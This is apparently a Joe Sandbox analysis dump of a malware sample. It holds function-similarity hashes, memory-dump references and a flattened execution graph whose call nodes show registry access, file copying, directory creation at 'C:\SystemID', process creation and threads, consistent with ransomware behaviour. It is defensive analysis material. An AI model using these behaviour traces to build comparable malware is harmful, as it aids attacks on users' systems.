                                                                                                                                                                        • Opcode ID: 7ca302b95abaf62ea75d686b6bc6ab29e87c5f509e24ab560bc2234ba0745c32
                                                                                                                                                                        • Instruction ID: 1fa300405a2e42dde38e7061665a38c963a15a25940620a00c40a27da3a24dfc
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ca302b95abaf62ea75d686b6bc6ab29e87c5f509e24ab560bc2234ba0745c32
                                                                                                                                                                        • Instruction Fuzzy Hash: A5E0C2763021247BF511235A6C8EFBF6A5CCBC37B6F500212F611E62E3CAA05D0281B0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: e81c785befce2a1ab07cfdf757b864c1e6f9329297637ef3c932c31da3a373b4
                                                                                                                                                                        • Instruction ID: 151819a2162ff7f8d2bf7de099b7425a0319fdb519a661555aefdd81b0e571ed
                                                                                                                                                                        • Opcode Fuzzy Hash: e81c785befce2a1ab07cfdf757b864c1e6f9329297637ef3c932c31da3a373b4
                                                                                                                                                                        • Instruction Fuzzy Hash: AFC13930720209DBCB24DE48D9D49BBF3BAFF84344B20452DEA468B655DBB0ED65CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                                                                                        • Opcode ID: c52cc277072dfadd5a8b015338d3d676d48f792ebaabd195e8cc460a2ede121c
                                                                                                                                                                        • Instruction ID: 793f58ae0fb82eaed2b09c1534a38640953d6cf3e15930cb77b1581bd370e1f9
                                                                                                                                                                        • Opcode Fuzzy Hash: c52cc277072dfadd5a8b015338d3d676d48f792ebaabd195e8cc460a2ede121c
                                                                                                                                                                        • Instruction Fuzzy Hash: 6551FB7174030527E7366EA59C82F6777ACDF41B92F050829FD54D71E2EA53E9088172
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: bcd5a37cab699677d27161ff36d915493823a84aa599941810b99c689712bc5f
                                                                                                                                                                        • Instruction ID: 2e95e7c317bd273b2cc57527236337c55eecaae07c4f3d0b9b354be2d4b2f74b
                                                                                                                                                                        • Opcode Fuzzy Hash: bcd5a37cab699677d27161ff36d915493823a84aa599941810b99c689712bc5f
                                                                                                                                                                        • Instruction Fuzzy Hash: F351B33172410E9BCF24CE18D8809BAF7BAFF84380B60457EEA058B251D771ED65CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0030AB93
                                                                                                                                                                        • ___raise_securityfailure.LIBCMT ref: 0030AC7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                        • String ID: 8?
                                                                                                                                                                        • API String ID: 3761405300-3606134346
                                                                                                                                                                        • Opcode ID: 1bd1db56c37a8c695559187d542515c0f352b9250734c6364d50e32a81ffc749
                                                                                                                                                                        • Instruction ID: 06984958d9db39a154d9931f9e87a0d49056e5a857968f961fd4a45effb28f90
                                                                                                                                                                        • Opcode Fuzzy Hash: 1bd1db56c37a8c695559187d542515c0f352b9250734c6364d50e32a81ffc749
                                                                                                                                                                        • Instruction Fuzzy Hash: E9213CB9541B04CBD75ACF5DFD91A607BECFB28310F50592AE5088B7A2D3B16940CF45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 002F3CA0
                                                                                                                                                                          • Part of subcall function 00303B4C: _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                        • _memset.LIBCMT ref: 002F3C83
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                                                                                        • Opcode ID: ec66e98293496620b86e71f56e6b70950fb4c04f6c72e0a75239e1016b0d6cd8
                                                                                                                                                                        • Instruction ID: e5f90b5bba2c0fe1960333f8150b615e6e209df1826e7b3f59e3313f6520c848
                                                                                                                                                                        • Opcode Fuzzy Hash: ec66e98293496620b86e71f56e6b70950fb4c04f6c72e0a75239e1016b0d6cd8
                                                                                                                                                                        • Instruction Fuzzy Hash: 7801DEB29013159BD3309F1AE801767F6E8AF40B60F20883EE9A9976C0E7B1E954C790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                        • Opcode ID: f4c3f8cc713b83533c2478bb78a858441ef88f4e9092b016230f2a92a4a969a7
                                                                                                                                                                        • Instruction ID: ed14f941161e9d0011847240224e7713e128e18242f90efe7898da6f845cb548
                                                                                                                                                                        • Opcode Fuzzy Hash: f4c3f8cc713b83533c2478bb78a858441ef88f4e9092b016230f2a92a4a969a7
                                                                                                                                                                        • Instruction Fuzzy Hash: DC1108729503469BCF31DF99DC5539EB7A0AF04314F600639EC5A56281E37299358BC2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00300E13
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                                        • API String ID: 3494438863-969893948
                                                                                                                                                                        • Opcode ID: f6d8ff21e0f10913d57e650f88c2a2edd5e695d5085352c04ac144116fee573d
                                                                                                                                                                        • Instruction ID: 03cc22073e9410566232a72a286d3440c7b5c1becbbd5aad5ff784eb1e57313b
                                                                                                                                                                        • Opcode Fuzzy Hash: f6d8ff21e0f10913d57e650f88c2a2edd5e695d5085352c04ac144116fee573d
                                                                                                                                                                        • Instruction Fuzzy Hash: F8F0C87130BB118BF72ECBA5FE21B612798E711720F11083AF700FE1C0E734A9418695
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00360686
                                                                                                                                                                          • Part of subcall function 00334C00: _raise.LIBCMT ref: 00334C18
                                                                                                                                                                        Strings
                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0036062E
                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00360638
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                        • Opcode ID: da7d333ccdc0ae492d02d5c1801ef340633d94dfd2799137f43e6e95c7c4a446
                                                                                                                                                                        • Instruction ID: e72e716a12f4cdc0e3c6444b7772d3f567787b3b861194f8604d81419b863496
                                                                                                                                                                        • Opcode Fuzzy Hash: da7d333ccdc0ae492d02d5c1801ef340633d94dfd2799137f43e6e95c7c4a446
                                                                                                                                                                        • Instruction Fuzzy Hash: BF014B75600200AFC312DF19EC42E5AB7E5AFC8304F1A8469F588DB362D761ED558B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F251
                                                                                                                                                                          • Part of subcall function 00310CFC: std::exception::_Copy_str.LIBCMT ref: 00310D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F266
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                                        • String ID: Te;
                                                                                                                                                                        • API String ID: 757275642-1031088568
                                                                                                                                                                        • Opcode ID: 03dc48a95e36984119854ca44da8f9873708b36af09dc366480727c16c2146a0
                                                                                                                                                                        • Instruction ID: df0541687c24305ea94370a5c52e4b9666e30e5d49fb5f7dae141fe363747221
                                                                                                                                                                        • Opcode Fuzzy Hash: 03dc48a95e36984119854ca44da8f9873708b36af09dc366480727c16c2146a0
                                                                                                                                                                        • Instruction Fuzzy Hash: AFD06275D0020DB7CB05EFA5C546CCD7B789A04344B008556AD145B145DA74A3898B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:7.9%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:182
39104->39102 39112 babb2e 39104->39112 39105->39101 39108->39101 39110 babf73 DestroyWindow 39108->39110 39111 babbe9 GetComputerNameW 39109->39111 39110->39101 39170 ba3100 39111->39170 39112->39101 39133 ba1cd0 39112->39133 39114 babc26 39177 bace80 59 API calls _memmove 39114->39177 39117 babb3f 39117->39108 39118 babc3a 39119 bb0bed _free 58 API calls 39118->39119 39132 babcdc 39119->39132 39120 babefb IsWindow 39121 babf28 39120->39121 39122 babf11 39120->39122 39121->39101 39122->39121 39123 babf1a DestroyWindow 39122->39123 39123->39121 39124 babef7 39124->39120 39124->39121 39125 ba4690 59 API calls 39125->39132 39131 babe8f CreateThread 39131->39132 39132->39120 39132->39124 39132->39125 39132->39131 39178 b9eff0 65 API calls 39132->39178 39179 bac330 39132->39179 39185 bac240 39132->39185 39191 bab8b0 39132->39191 39213 bace80 59 API calls _memmove 39132->39213 39134 bbf7c0 __write_nolock 39133->39134 39135 ba1cf2 RegOpenKeyExW 39134->39135 39136 ba1d20 _memset 39135->39136 39137 ba1e6a 39135->39137 39138 ba1d40 RegQueryValueExW RegCloseKey 39136->39138 39137->39117 39139 ba1d8f 39138->39139 39139->39139 39214 ba5c10 39139->39214 39141 ba1dbf 39142 ba1e7c 39141->39142 39143 ba1dd1 lstrlenA 39141->39143 39144 ba1e89 39142->39144 39145 ba1e94 6 API calls 39142->39145 39229 ba3520 39143->39229 39144->39145 39147 ba1ef5 UuidCreate UuidToStringW 39145->39147 39149 ba1f36 39147->39149 39148 ba1e3c PathFileExistsW 39148->39142 39150 ba1e52 39148->39150 39152 ba5c10 59 API calls 39149->39152 39150->39137 39232 ba4690 39150->39232 39151 ba1df1 39151->39148 39153 ba1f59 RpcStringFreeW PathAppendW CreateDirectoryW 39152->39153 39155 ba1f98 39153->39155 39157 ba1fce 39153->39157 39156 ba5c10 59 API calls 39155->39156 39156->39157 39158 ba5c10 59 API calls 39157->39158 39159 ba201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 39158->39159 39160 ba21d1 39159->39160 39161 ba207c _memset 39159->39161 39160->39137 39162 ba2095 6 API calls 39161->39162 39163 ba2109 
39162->39163 39164 ba2115 _memset 39162->39164 39255 ba3260 39163->39255 39166 ba2125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 39164->39166 39167 ba21aa GetLastError 39166->39167 39168 ba21b2 39166->39168 39167->39160 39169 ba21c0 WaitForSingleObject 39168->39169 39169->39160 39169->39169 39171 ba3133 39170->39171 39172 ba3121 39170->39172 39175 ba5c10 59 API calls 39171->39175 39173 ba5c10 59 API calls 39172->39173 39174 ba312c 39173->39174 39174->39114 39176 ba3159 39175->39176 39176->39114 39177->39118 39178->39132 39282 bad3c0 39179->39282 39182 bac35b 39182->39132 39183 bdf23e 59 API calls 39184 bac37a 39183->39184 39184->39132 39292 bad340 39185->39292 39188 bac26b 39188->39132 39189 bdf23e 59 API calls 39190 bac28a 39189->39190 39190->39132 39192 bab8d6 39191->39192 39194 bab8e0 39191->39194 39193 ba4690 59 API calls 39192->39193 39193->39194 39195 bab916 39194->39195 39196 ba4690 59 API calls 39194->39196 39197 bab930 39195->39197 39198 ba4690 59 API calls 39195->39198 39196->39195 39199 bab94a 39197->39199 39200 ba4690 59 API calls 39197->39200 39198->39197 39201 bab964 39199->39201 39202 ba4690 59 API calls 39199->39202 39200->39199 39298 babfd0 39201->39298 39202->39201 39204 bab976 39205 babfd0 59 API calls 39204->39205 39206 bab988 39205->39206 39207 babfd0 59 API calls 39206->39207 39208 bab99a 39207->39208 39209 bab9b4 39208->39209 39210 ba4690 59 API calls 39208->39210 39211 bab9f2 39209->39211 39310 ba3ff0 39209->39310 39210->39209 39211->39132 39213->39132 39215 ba5c66 39214->39215 39221 ba5c1e 39214->39221 39216 ba5cff 39215->39216 39217 ba5c76 39215->39217 39271 bdf23e 39216->39271 39218 ba5c88 ___check_float_string 39217->39218 39262 ba6950 39217->39262 39218->39141 39221->39215 39225 ba5c45 39221->39225 39227 ba4690 59 API calls 39225->39227 39228 ba5c60 39227->39228 39228->39141 39230 ba4690 59 API calls 39229->39230 39231 ba3550 39230->39231 39231->39151 39233 ba46a9 39232->39233 39234 ba478c 39232->39234 39236 ba46e9 
39233->39236 39237 ba46b6 39233->39237 39280 bdf26c 59 API calls 3 library calls 39234->39280 39240 ba47a0 39236->39240 39241 ba46f5 39236->39241 39238 ba4796 39237->39238 39239 ba46c2 39237->39239 39281 bdf26c 59 API calls 3 library calls 39238->39281 39279 ba3340 59 API calls _memmove 39239->39279 39243 bdf23e 59 API calls 39240->39243 39245 ba6950 59 API calls 39241->39245 39253 ba4707 ___check_float_string 39241->39253 39244 ba47aa 39243->39244 39246 ba47bf 39244->39246 39247 ba47cd 39244->39247 39245->39253 39249 ba5c10 59 API calls 39246->39249 39252 ba5c10 59 API calls 39247->39252 39251 ba47c8 39249->39251 39250 ba46e0 39250->39137 39251->39137 39254 ba47ec 39252->39254 39253->39137 39254->39137 39256 ba326f 39255->39256 39257 ba327d 39255->39257 39258 ba5c10 59 API calls 39256->39258 39260 ba5c10 59 API calls 39257->39260 39259 ba3278 39258->39259 39259->39164 39261 ba329c 39260->39261 39261->39164 39263 ba6986 39262->39263 39264 ba69d3 39263->39264 39265 bb3b4c 59 API calls 39263->39265 39267 ba6a0d ___check_float_string 39263->39267 39264->39267 39276 bdf1bb 59 API calls 3 library calls 39264->39276 39265->39264 39267->39218 39277 bc0cfc 58 API calls std::exception::_Copy_str 39271->39277 39273 bdf256 39278 bc0eca RaiseException 39273->39278 39275 bdf26b 39277->39273 39278->39275 39279->39250 39280->39238 39281->39240 39285 baccc0 39282->39285 39286 bb3b4c 59 API calls 39285->39286 39287 baccca 39286->39287 39288 bac347 39287->39288 39291 bdf1bb 59 API calls 3 library calls 39287->39291 39288->39182 39288->39183 39293 bacc50 59 API calls 39292->39293 39294 bad36c 39293->39294 39295 bac257 39294->39295 39297 bad740 59 API calls 39294->39297 39295->39188 39295->39189 39297->39295 39299 bac001 39298->39299 39305 bac00a 39298->39305 39300 bac04c 39299->39300 39301 bac083 39299->39301 39299->39305 39337 bacf30 39300->39337 39302 bac09e 39301->39302 39308 bac0e1 39301->39308 39304 bacf30 59 API calls 39302->39304 39307 bac0b2 39304->39307 39305->39204 
39307->39305 39341 bad5b0 39307->39341 39345 bac540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 39308->39345 39311 ba4009 39310->39311 39312 ba40f2 39310->39312 39314 ba405d 39311->39314 39315 ba4016 39311->39315 39357 bdf26c 59 API calls 3 library calls 39312->39357 39316 ba4106 39314->39316 39319 ba4066 39314->39319 39317 ba40fc 39315->39317 39318 ba4022 39315->39318 39323 bdf23e 59 API calls 39316->39323 39358 bdf26c 59 API calls 3 library calls 39317->39358 39321 ba402b 39318->39321 39322 ba4044 39318->39322 39333 ba4078 ___check_float_string 39319->39333 39348 ba6760 39319->39348 39346 ba2e80 59 API calls _memmove 39321->39346 39347 ba2e80 59 API calls _memmove 39322->39347 39327 ba4110 39323->39327 39330 ba413a 39327->39330 39331 ba412c 39327->39331 39328 ba4054 39328->39211 39329 ba403b 39329->39211 39335 ba56d0 59 API calls 39330->39335 39359 ba56d0 39331->39359 39333->39211 39334 ba4135 39334->39211 39336 ba4151 39335->39336 39336->39211 39338 bacf5b 39337->39338 39339 bacf41 39337->39339 39338->39305 39339->39338 39340 ba4690 59 API calls 39339->39340 39340->39339 39342 bad5e2 39341->39342 39343 bad63e 39342->39343 39344 ba4690 59 API calls 39342->39344 39343->39305 39344->39342 39345->39307 39346->39329 39347->39328 39351 ba6793 39348->39351 39349 ba6817 ___check_float_string 39349->39333 39350 ba67dc 39350->39349 39378 bdf1bb 59 API calls 3 library calls 39350->39378 39351->39349 39351->39350 39352 bb3b4c 59 API calls 39351->39352 39352->39350 39357->39317 39358->39316 39360 ba5735 39359->39360 39366 ba56de 39359->39366 39361 ba57bc 39360->39361 39362 ba573e 39360->39362 39363 bdf23e 59 API calls 39361->39363 39364 ba6760 59 API calls 39362->39364 39369 ba5750 ___check_float_string 39362->39369 39365 ba57c6 39363->39365 39364->39369 39367 ba57db 39365->39367 39379 bdf26c 59 API calls 3 library calls 39365->39379 39366->39360 39371 ba5704 39366->39371 39367->39334 39369->39334 39370 ba5806 39372 ba5709 
39371->39372 39373 ba571f 39371->39373 39374 ba3ff0 59 API calls 39372->39374 39375 ba3ff0 59 API calls 39373->39375 39376 ba5719 39374->39376 39377 ba572f 39375->39377 39376->39334 39377->39334 39379->39370 39380 be4c30 39382 bb0c62 58 API calls 39380->39382 39381 be4c3a 39382->39381 39383 bb3f84 39384 bb3f90 __alloc_osfhnd 39383->39384 39420 bc2603 GetStartupInfoW 39384->39420 39386 bb3f95 39422 bb78d5 GetProcessHeap 39386->39422 39388 bb3fed 39389 bb3ff8 39388->39389 39751 bb411a 58 API calls 3 library calls 39388->39751 39423 bb5141 39389->39423 39392 bb3ffe 39393 bb4009 __RTC_Initialize 39392->39393 39752 bb411a 58 API calls 3 library calls 39392->39752 39444 bb8754 39393->39444 39396 bb4018 39397 bb4024 GetCommandLineW 39396->39397 39753 bb411a 58 API calls 3 library calls 39396->39753 39463 bc235f GetEnvironmentStringsW 39397->39463 39400 bb4023 39400->39397 39403 bb403e 39404 bb4049 39403->39404 39754 bb7c2e 58 API calls 3 library calls 39403->39754 39473 bc21a1 39404->39473 39408 bb405a 39487 bb7c68 39408->39487 39411 bb4062 39412 bb406d __wwincmdln 39411->39412 39756 bb7c2e 58 API calls 3 library calls 39411->39756 39493 ba9f90 39412->39493 39415 bb4081 39416 bb4090 39415->39416 39748 bb7f3d 39415->39748 39757 bb7c59 58 API calls _doexit 39416->39757 39419 bb4095 __alloc_osfhnd 39421 bc2619 39420->39421 39421->39386 39422->39388 39758 bb7d6c 36 API calls 2 library calls 39423->39758 39425 bb5146 39759 bb8c48 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 39425->39759 39427 bb514f 39760 bb51b7 61 API calls 2 library calls 39427->39760 39428 bb514b 39428->39427 39761 bc24f7 TlsAlloc 39428->39761 39431 bb5161 39431->39427 39433 bb516c 39431->39433 39432 bb5154 39432->39392 39434 bb8c96 __calloc_crt 58 API calls 39433->39434 39435 bb5179 39434->39435 39436 bb51ae 39435->39436 39762 bc2553 TlsSetValue 39435->39762 39764 bb51b7 61 API calls 2 library calls 39436->39764 39439 bb518d 39439->39436 39441 bb5193 39439->39441 39440 bb51b3 39440->39392 39763 
bb508e 58 API calls 4 library calls 39441->39763 39443 bb519b GetCurrentThreadId 39443->39392 39445 bb8760 __alloc_osfhnd 39444->39445 39446 bb8af7 __lock 58 API calls 39445->39446 39447 bb8767 39446->39447 39448 bb8c96 __calloc_crt 58 API calls 39447->39448 39450 bb8778 39448->39450 39449 bb87e3 GetStartupInfoW 39451 bb87f8 39449->39451 39458 bb8927 39449->39458 39450->39449 39452 bb8783 __alloc_osfhnd @_EH4_CallFilterFunc@8 39450->39452 39455 bb8c96 __calloc_crt 58 API calls 39451->39455 39451->39458 39460 bb8846 39451->39460 39452->39396 39453 bb89ef 39767 bb89ff LeaveCriticalSection _doexit 39453->39767 39455->39451 39456 bb8974 GetStdHandle 39456->39458 39457 bb8987 GetFileType 39457->39458 39458->39453 39458->39456 39458->39457 39766 bc263e InitializeCriticalSectionAndSpinCount 39458->39766 39459 bb887a GetFileType 39459->39460 39460->39458 39460->39459 39765 bc263e InitializeCriticalSectionAndSpinCount 39460->39765 39464 bb4034 39463->39464 39465 bc2370 39463->39465 39469 bc1f64 GetModuleFileNameW 39464->39469 39466 bb8cde __malloc_crt 58 API calls 39465->39466 39467 bc2396 ___check_float_string 39466->39467 39468 bc23ac FreeEnvironmentStringsW 39467->39468 39468->39464 39470 bc1f98 _wparse_cmdline 39469->39470 39471 bb8cde __malloc_crt 58 API calls 39470->39471 39472 bc1fd8 _wparse_cmdline 39470->39472 39471->39472 39472->39403 39474 bc21ba __wsetenvp 39473->39474 39478 bb404f 39473->39478 39475 bb8c96 __calloc_crt 58 API calls 39474->39475 39483 bc21e3 __wsetenvp 39475->39483 39476 bc223a 39477 bb0bed _free 58 API calls 39476->39477 39477->39478 39478->39408 39755 bb7c2e 58 API calls 3 library calls 39478->39755 39479 bb8c96 __calloc_crt 58 API calls 39479->39483 39480 bc225f 39482 bb0bed _free 58 API calls 39480->39482 39482->39478 39483->39476 39483->39478 39483->39479 39483->39480 39484 bc2276 39483->39484 39768 bb962f 58 API calls __woutput_s_l 39483->39768 39769 bb42fd 8 API calls 2 library calls 39484->39769 39486 bc2282 39488 bb7c74 
__IsNonwritableInCurrentImage 39487->39488 39770 bcaeb5 39488->39770 39490 bb7c92 __initterm_e 39491 bb19ac __cinit 67 API calls 39490->39491 39492 bb7cb1 __cinit __IsNonwritableInCurrentImage 39490->39492 39491->39492 39492->39411 39494 ba9fa0 __write_nolock 39493->39494 39773 b9cf10 39494->39773 39496 ba9fb0 39497 ba9fc4 GetCurrentProcess GetLastError SetPriorityClass 39496->39497 39498 ba9fb4 39496->39498 39500 ba9fe6 39497->39500 39501 ba9fe4 GetLastError 39497->39501 40145 ba24e0 109 API calls _memset 39498->40145 39503 bad3c0 59 API calls 39500->39503 39501->39500 39502 ba9fb9 39502->39415 39504 baa00a 39503->39504 39505 bab669 39504->39505 39506 baa022 39504->39506 39507 bdf23e 59 API calls 39505->39507 39510 bad340 59 API calls 39506->39510 39508 bab673 39507->39508 39509 bdf23e 59 API calls 39508->39509 39511 bab67d 39509->39511 39512 baa04d 39510->39512 39512->39508 39513 baa065 39512->39513 39787 ba3a90 39513->39787 39517 baa159 GetCommandLineW CommandLineToArgvW lstrcpyW 39518 baa33d GlobalFree 39517->39518 39533 baa196 39517->39533 39519 baa45c 39518->39519 39520 baa354 39518->39520 39523 ba2220 76 API calls 39519->39523 39803 ba2220 39520->39803 39521 baa100 39521->39517 39524 baa359 39523->39524 39526 baa466 39524->39526 39818 b9ef50 39524->39818 39525 baa1cc lstrcmpW lstrcmpW 39525->39533 39526->39415 39527 bb0235 60 API calls ___get_qualified_locale 39527->39533 39529 baa24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 39529->39533 39530 baa48f 39532 baa4ef 39530->39532 39823 ba3ea0 39530->39823 39534 ba1cd0 92 API calls 39532->39534 39533->39518 39533->39525 39533->39527 39533->39529 39535 baa361 39533->39535 39536 baa563 39534->39536 40146 bb3c92 59 API calls ___get_qualified_locale_downlevel 39535->40146 39543 ba4690 59 API calls 39536->39543 39571 baa5db 39536->39571 39538 baa36e lstrcpyW lstrcpyW 39539 baa395 OpenProcess 39538->39539 39540 baa3a9 WaitForSingleObject CloseHandle 39539->39540 39541 baa402 39539->39541 39540->39541 39544 baa3cb 
